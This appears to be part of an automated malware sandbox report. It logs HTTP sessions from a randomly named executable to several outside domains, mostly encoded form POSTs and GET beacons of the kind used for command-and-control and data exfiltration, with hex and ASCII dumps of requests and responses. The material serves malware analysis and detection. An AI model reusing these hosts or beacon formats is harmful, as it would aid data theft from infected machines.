                                                              Data Ascii: rhcZq4x<X)7Q)?|}]\&1-iCJ`Y{Tw3[(e>#v[c^WO\s'oT)y|KiMA&!Bno(W 'xT_YiAqFOJf,n9"v8O4l81:OQ8z
                                                              Sep 11, 2024 22:55:49.964772940 CEST1120INData Raw: be 2e 60 74 21 b6 a2 36 f2 26 79 1c db db 57 59 55 f8 41 89 78 89 d2 a3 c4 93 16 fc e1 f3 0f 9f 7f f8 6c 78 4a 23 27 28 44 ec 40 8d 26 de b9 0b 50 6e fe a1 a0 ec 4c 61 39 9d bd 0f 37 fb 42 32 e5 17 c4 59 9a e9 6b 96 4a 80 ec 7a 7a 0a d4 43 7d 89
                                                              Data Ascii: .`t!6&yWYUAxlxJ#'(D@&PnLa97B2YkJzzC} <!gB]O+\xE1vhx[9CZ7Y"2nt]p`W-@\/kzl!b(o?XE`l[e$Ov9<A]7+%^X->cV.yY)$dK
                                                              Sep 11, 2024 22:55:49.964813948 CEST1236INData Raw: 42 aa 68 de e8 e6 d8 86 31 be 97 9e 0c 7c e6 30 2b 07 c3 0e 03 00 3d bf 42 62 04 a4 60 89 35 2f 84 08 1e ce b1 7b 96 86 e9 3d 38 44 39 80 54 c7 b1 5b c2 93 72 4d c3 56 22 d4 8f ce bc 54 71 3c f4 ff 56 51 a2 95 b6 87 c2 c9 05 a7 98 e4 09 7b 28 ef
                                                              Data Ascii: Bh1|0+=Bb`5/{=8D9T[rMV"Tq<VQ{(]#2B7b6y4@qr4yV(*${|,E&%S7la`z/'c<6`ukoJ\S~rou *FTClJ~uL
                                                              Sep 11, 2024 22:55:49.973081112 CEST1236INData Raw: f5 6f 0e 38 4c 6e 52 86 0e 9e d2 44 5d 53 78 9f f0 86 7e 92 57 25 35 73 e6 60 1f 66 47 e9 7b cb 69 c4 a0 7f c8 86 9d c7 c4 67 2a 7a c7 1a 28 c8 b6 71 ab 55 a2 32 80 30 82 1b 86 3e be 35 2c 99 f1 e0 fb 10 ed 23 c6 dd 5b ff 2a 6f 2d 9a 51 6a 58 11
                                                              Data Ascii: o8LnRD]Sx~W%5s`fG{ig*z(qU20>5,#[*o-QjX|5M,Qw1{J[0oU.TK[ vf>w!JOYdR]Sk1N1}\m5QX$w|vQBrU-\|96HR;1R


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.75967765.108.194.49805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:51.461838961 CEST438OUTGET /bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.maya24.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:52.282370090 CEST517INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              x-redirect-by: WordPress
                                                              location: http://maya24.xyz/bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXM
                                                              content-length: 0
                                                              date: Wed, 11 Sep 2024 20:55:52 GMT
                                                              server: LiteSpeed


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.759678208.91.197.13805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:57.619843006 CEST696OUTPOST /pa4w/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hiretemp.net
                                                              Origin: http://www.hiretemp.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hiretemp.net/pa4w/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 49 6b 6e 51 70 73 74 62 67 5a 52 6f 75 47 44 51 31 66 4d 78 66 52 66 63 51 6e 64 56 35 7a 6e 31 61 38 56 62 49 52 4c 67 6c 70 6b 4c 37 55 6e 6a 67 6c 49 74 77 56 58 7a 44 45 58 64 65 66 4a 6d 72 66 52 32 41 6f 47 6f 69 35 61 6b 38 32 63 79 48 4e 4f 4f 2f 63 6a 34 61 7a 31 50 63 45 63 45 61 41 7a 78 37 37 31 57 64 2b 73 55 4e 77 50 6a 4d 4f 59 4e 5a 74 39 6f 72 70 64 49 71 4f 61 52 75 4f 63 61 59 4f 46 41 32 33 65 59 6d 50 4f 31 61 48 75 2f 35 6f 75 37 56 4f 77 56 4b 6c 42 39 4d 43 6d 56 73 45 78 55 45 6c 74 6b 39 71 63 31 77 4c 6d 76 38 50 76 6f 56 4e 78 46 69 6c 69 4f 74 76 37 73 37 32 59 54 47 66 30 70 67 71 73 66 67 3d 3d
                                                              Data Ascii: XvhP6L=QIknQpstbgZRouGDQ1fMxfRfcQndV5zn1a8VbIRLglpkL7UnjglItwVXzDEXdefJmrfR2AoGoi5ak82cyHNOO/cj4az1PcEcEaAzx771Wd+sUNwPjMOYNZt9orpdIqOaRuOcaYOFA23eYmPO1aHu/5ou7VOwVKlB9MCmVsExUEltk9qc1wLmv8PvoVNxFiliOtv7s72YTGf0pgqsfg==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.759679208.91.197.13805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:00.164180994 CEST716OUTPOST /pa4w/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hiretemp.net
                                                              Origin: http://www.hiretemp.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hiretemp.net/pa4w/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 49 6b 6e 51 70 73 74 62 67 5a 52 79 4f 32 44 63 32 33 4d 35 66 52 65 42 67 6e 64 65 5a 7a 5a 31 64 30 56 62 4a 56 62 68 57 4e 6b 4c 61 49 6e 78 31 4a 49 73 77 56 58 37 6a 45 4f 54 2b 66 43 6d 72 43 6d 32 41 45 47 6f 6a 64 61 6b 35 4b 63 7a 30 56 50 4f 76 63 39 68 4b 7a 33 4c 63 45 63 45 61 41 7a 78 36 4b 65 57 64 6d 73 55 59 34 50 78 64 4f 5a 4f 5a 74 2b 76 72 70 64 65 71 4f 65 52 75 50 4a 61 5a 53 37 41 30 66 65 59 6d 66 4f 31 49 2f 76 77 35 6f 6f 31 31 4f 6e 65 34 38 36 38 4a 71 39 58 36 4d 2b 4e 32 46 37 73 72 33 2b 76 53 48 4b 78 74 33 55 73 58 70 48 53 45 34 58 4d 73 72 6a 68 5a 43 35 4d 78 36 65 6b 79 4c 6f 4a 66 51 38 72 4e 39 6d 43 30 6e 2b 45 67 33 75 42 66 4d 4b 4e 4e 30 3d
                                                              Data Ascii: XvhP6L=QIknQpstbgZRyO2Dc23M5fReBgndeZzZ1d0VbJVbhWNkLaInx1JIswVX7jEOT+fCmrCm2AEGojdak5Kcz0VPOvc9hKz3LcEcEaAzx6KeWdmsUY4PxdOZOZt+vrpdeqOeRuPJaZS7A0feYmfO1I/vw5oo11One4868Jq9X6M+N2F7sr3+vSHKxt3UsXpHSE4XMsrjhZC5Mx6ekyLoJfQ8rN9mC0n+Eg3uBfMKNN0=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.759680208.91.197.13805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:02.725509882 CEST1729OUTPOST /pa4w/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hiretemp.net
                                                              Origin: http://www.hiretemp.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hiretemp.net/pa4w/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 49 6b 6e 51 70 73 74 62 67 5a 52 79 4f 32 44 63 32 33 4d 35 66 52 65 42 67 6e 64 65 5a 7a 5a 31 64 30 56 62 4a 56 62 68 57 46 6b 4c 49 73 6e 6a 47 52 49 72 77 56 58 31 44 45 54 54 2b 66 66 6d 72 4b 69 32 41 59 34 6f 67 31 61 32 72 53 63 6a 56 56 50 42 76 63 39 38 61 7a 79 50 63 45 4a 45 61 52 36 78 36 36 65 57 64 6d 73 55 66 49 50 79 4d 4f 5a 49 5a 74 39 6f 72 70 5a 49 71 4f 32 52 75 32 2b 61 5a 47 72 44 45 2f 65 59 48 76 4f 77 39 72 76 35 35 6f 71 32 31 50 69 65 34 41 6c 38 50 4f 66 58 36 52 6c 4e 31 56 37 2f 50 36 71 30 52 72 57 74 63 58 65 74 32 4e 45 5a 56 4d 33 4c 4d 33 4d 67 36 32 61 51 69 75 68 6c 43 4c 39 4b 4a 46 73 36 63 78 48 61 41 76 74 55 30 71 33 59 65 49 75 62 62 79 52 4f 54 37 4a 6f 76 37 67 4f 73 79 5a 2f 52 6b 6a 50 58 4a 41 62 77 6f 79 48 67 41 44 57 51 36 32 7a 48 75 45 65 46 6d 67 35 6e 41 52 39 44 45 5a 2f 39 54 6e 45 62 4a 37 77 68 78 55 59 63 36 78 70 4f 36 53 63 51 64 74 44 4b 57 46 71 64 53 6e 36 46 6b 65 44 37 61 4d 61 6c 48 47 44 31 31 6d 62 57 7a [TRUNCATED]
                                                              Data Ascii: XvhP6L=QIknQpstbgZRyO2Dc23M5fReBgndeZzZ1d0VbJVbhWFkLIsnjGRIrwVX1DETT+ffmrKi2AY4og1a2rScjVVPBvc98azyPcEJEaR6x66eWdmsUfIPyMOZIZt9orpZIqO2Ru2+aZGrDE/eYHvOw9rv55oq21Pie4Al8POfX6RlN1V7/P6q0RrWtcXet2NEZVM3LM3Mg62aQiuhlCL9KJFs6cxHaAvtU0q3YeIubbyROT7Jov7gOsyZ/RkjPXJAbwoyHgADWQ62zHuEeFmg5nAR9DEZ/9TnEbJ7whxUYc6xpO6ScQdtDKWFqdSn6FkeD7aMalHGD11mbWzzvi/BfZG2+OmMiKMoUkO7DeQl/q24mCwqpFk83jz46q3w36cGyjP7TBnUweo3TOnRjXB7b4ecFPxS/HXddZURGVQNDp7iBNZGJKweIx0ic9Y9Fp1iW0R4NrjmUUUyjKj2uK5aPbGUXkONLE7R2LAgo+FF+rVtNoqbg9j9c/f2/tkaPrI8g9nhfGnX+sis5TOjs4r9ZVwZhGMrXh/ySIKQ7K6/Lx9qZeQqTHES7JqNoAaB3hRJUeQS9Totrnne3acS0FSFvb1Z6lagJztfAWVPFRQf1XkH1l8zchaw6kD5jUaZnIzs+TKubeeydHpTxcAZ8wXCG5nNUw1mqofA5zMxh+cS6mJl/kW9M7X12jSKY2T+rlOexQYNkgEQ0P6b2LdByE7LrKGSRGvnN6mwARon55EaAjAKlU36+U7o53UTojKXqryOlE2OjfNYIhQIlc+x/JTJNP+It2bNRnblhDQlaeIa2+SaGGB6s2P2enxah1Ie1VMAyMxJFxzetEC3MEH3AIB30nNTop4GeyNa2ryhMWe+vUwbywxQTMJkrtHeji/bjBUMoTWivh6jAGr4qNX4oJ+Eltn+6+jIZEDU2MOvV16co2TfIbt4cpnQmlNUV+nVSvute+EWfkUW+mvwyaHzmktS9mahoa7+7YxLO9iy+R4eJXR7/zFlY [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.759681208.91.197.13805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:05.269747972 CEST440OUTGET /pa4w/?XvhP6L=dKMHTeotdxQA3vuiSRDg588JUBKwJbza89FzR4k2/BlHdZNbjG9srDVj4iYsPfHZhZaT/x4F9RFLyq608nYJAYQb5LXQOtEiJ4lw7e+xANqPS8JKy934Fa9hsYgKS5KVWYuJXZeSCWTj&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.hiretemp.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:06.275540113 CEST1236INHTTP/1.1 200 OK
                                                              Date: Wed, 11 Sep 2024 20:56:05 GMT
                                                              Server: Apache
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                              Set-Cookie: vsid=910vr4736337658330479; expires=Mon, 10-Sep-2029 20:56:05 GMT; Max-Age=157680000; path=/; domain=www.hiretemp.net; HttpOnly
                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Do9FUAT99flEOqyV/H6pIxyme4j01TUt1aIq8Mcxd2bhNPifQ752OEZfxH8Djv2KDFYapgx/HqN0LtgowuT7TQ==
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              Connection: close
                                                              Data Raw: 39 31 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20
                                                              Data Ascii: 91fd<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                              Sep 11, 2024 22:56:06.275599003 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20
                                                              Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("
                                                              Sep 11, 2024 22:56:06.275639057 CEST1236INData Raw: 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29
                                                              Data Ascii: cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.
                                                              Sep 11, 2024 22:56:06.275676012 CEST1236INData Raw: 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63
                                                              Data Ascii: a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cm
                                                              Sep 11, 2024 22:56:06.275711060 CEST1236INData Raw: 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 69 66 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e
                                                              Data Ascii: 1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https
                                                              Sep 11, 2024 22:56:06.275747061 CEST1236INData Raw: 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e 62 6f 64 79 29 7b 75 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 76 61 72 20 74 3d 76 28 22 62 6f 64 79 22 29 3b 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29
                                                              Data Ascii: hild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}
                                                              Sep 11, 2024 22:56:06.275783062 CEST1236INData Raw: 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 2c 22 49 6e 74 65 6e 74 69 6f 6e 61 6c 6c 79 20 68 69 64 64 65 6e 2c 20 70 6c 65 61 73 65 20 69 67 6e 6f 72 65 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c
                                                              Data Ascii: ;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=docum
                                                              Sep 11, 2024 22:56:06.275823116 CEST1236INData Raw: 74 75 72 6e 7b 67 70 70 56 65 72 73 69 6f 6e 3a 22 31 2e 30 22 2c 63 6d 70 53 74 61 74 75 73 3a 22 73 74 75 62 22 2c 63 6d 70 44 69 73 70 6c 61 79 53 74 61 74 75 73 3a 22 68 69 64 64 65 6e 22 2c 73 75 70 70 6f 72 74 65 64 41 50 49 73 3a 5b 22 74
                                                              Data Ascii: turn{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=arguments;__gpp.q=__gpp.q||[];if(!a.length){return __gpp.q}var g
                                                              Sep 11, 2024 22:56:06.275861979 CEST761INData Raw: 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 63 6d 70 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 63 6d 70 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 63 6d 70 28 62 2e 63 6f 6d 6d 61 6e 64 2c 62
                                                              Data Ascii: =="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmpReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&
                                                              Sep 11, 2024 22:56:06.275899887 CEST1236INData Raw: 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 67 70 70 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 67 70 70 28 62 2e 63 6f 6d 6d 61 6e 64 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 67 70 70 52 65 74 75 72 6e 3a 7b
                                                              Data Ascii: in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window
                                                              Sep 11, 2024 22:56:06.281511068 CEST1236INData Raw: 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 74 63 66 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29
                                                              Data Ascii: ow.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><scri


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.75968276.223.113.161805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:11.669253111 CEST696OUTPOST /otqc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.justlivn.net/otqc/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 75 6d 58 57 63 59 54 51 68 36 6e 73 52 32 65 65 48 4e 72 6e 6d 5a 74 6f 56 33 57 77 55 32 44 6e 6a 62 69 42 6d 6c 72 7a 48 6f 66 7a 72 77 6c 4d 69 43 78 65 52 30 6e 31 33 37 7a 4f 4f 30 6b 32 34 70 54 72 62 71 73 73 62 6e 5a 52 4d 7a 33 6c 6e 48 53 4b 38 46 2f 37 49 31 2f 6f 4e 46 7a 62 75 43 35 69 31 66 78 43 75 6d 6c 74 79 4c 30 39 69 57 43 2b 56 56 50 6b 33 79 74 59 67 36 46 78 78 34 2b 44 31 53 68 65 43 2f 35 63 45 68 7a 49 6e 79 32 61 64 38 6f 6b 77 4e 62 58 61 70 78 74 63 61 4f 74 64 45 66 2f 5a 72 2f 78 47 36 6f 66 41 5a 75 4b 39 37 74 2b 6d 61 75 6e 59 6f 4f 2f 39 47 52 30 58 36 30 41 4f 4c 33 57 2b 55 59 4e 4c 51 3d 3d
                                                              Data Ascii: XvhP6L=umXWcYTQh6nsR2eeHNrnmZtoV3WwU2DnjbiBmlrzHofzrwlMiCxeR0n137zOO0k24pTrbqssbnZRMz3lnHSK8F/7I1/oNFzbuC5i1fxCumltyL09iWC+VVPk3ytYg6Fxx4+D1SheC/5cEhzIny2ad8okwNbXapxtcaOtdEf/Zr/xG6ofAZuK97t+maunYoO/9GR0X60AOL3W+UYNLQ==
                                                              Sep 11, 2024 22:56:12.113015890 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:12 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.75968376.223.113.161805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:14.434725046 CEST716OUTPOST /otqc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.justlivn.net/otqc/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
